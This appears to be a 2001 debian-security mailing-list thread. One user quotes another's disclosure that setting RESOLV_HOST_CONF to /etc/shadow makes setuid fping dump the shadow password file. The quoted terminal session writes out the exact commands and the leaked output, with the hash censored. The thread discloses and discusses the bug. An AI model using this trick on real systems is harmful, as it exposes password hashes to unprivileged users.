When I tried it, I did not get the same results.
-rwsr-xr-x 1 root root 19728 Oct 30 1999 /usr/bin/fping* ldd `which fping` libc.so.6 => /lib/libc.so.6 (0x00127000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000) ping localhost PING localhost (127.0.0.1): 56 data bytes --- localhost ping statistics --- 6 packets transmitted, 0 packets received, 100% packet loss fping localhost localhost is unreachable -- Kevin - [EMAIL PROTECTED] -- Original message -- > Since I've not had any response yet, I thought I'd give a demonstration of how > nasty this is: > Script started on Mon Jan 8 17:48:23 2001 > [EMAIL PROTECTED]:~$ export RESOLV_HOST_CONF=/etc/shadow > [EMAIL PROTECTED]:~$ ping localhost > PING localhost (127.0.0.1): 56 data bytes > --- localhost ping statistics --- > 2 packets transmitted, 0 packets received, 100% packet loss > [EMAIL PROTECTED]:~$ fping localhost > /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::' > [snip] > /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::' > localhost is unreachable > [EMAIL PROTECTED]:~$ ls -l `which fping` > -rwsr-xr-x 1 root root 19728 May 15 2000 /usr/bin/fping > [EMAIL PROTECTED]:~$ ls -l `which ping` > -rwsr-xr-x 1 root root 15036 Dec 31 04:11 /bin/ping > [EMAIL PROTECTED]:~$ ldd `which fping` > libc.so.6 => /lib/libc.so.6 (0x40021000) > /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) > [EMAIL PROTECTED]:~$ ldd `which ping` > libc.so.6 => /lib/libc.so.6 (0x40021000) > /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) > [EMAIL PROTECTED]:~$ exit > Script done on Mon Jan 8 17:49:42 2001 > It seems to work for some setuid programs, but not others. I'm running the > most recent packages from unstable as of today: > ii libc6 2.2-9 GNU C Library: Shared libraries and Timezone > ii netkit-ping 0.10-5 The ping utility from netkit > ii fping 2.2b1-2 Send ICMP ECHO_REQUEST packets to network ho > cheers, > Thomas > On Mon, 8 Jan 2001, thomas lakofski wrote: >> From: thomas lakofski <[EMAIL PROTECTED]> >> To: [EMAIL PROTECTED], debian-security@lists.debian.org >> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT) >> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability >> >> Hi, >> >> A friend of mine just tried this against my unstable box and successfully >> obtained the contents of /etc/shadow. >> >> I imagine that this is a problem in libc -- I'll leave it to >> [EMAIL PROTECTED] to file bug reports. >> >> cheers, >> >> Thomas >> >>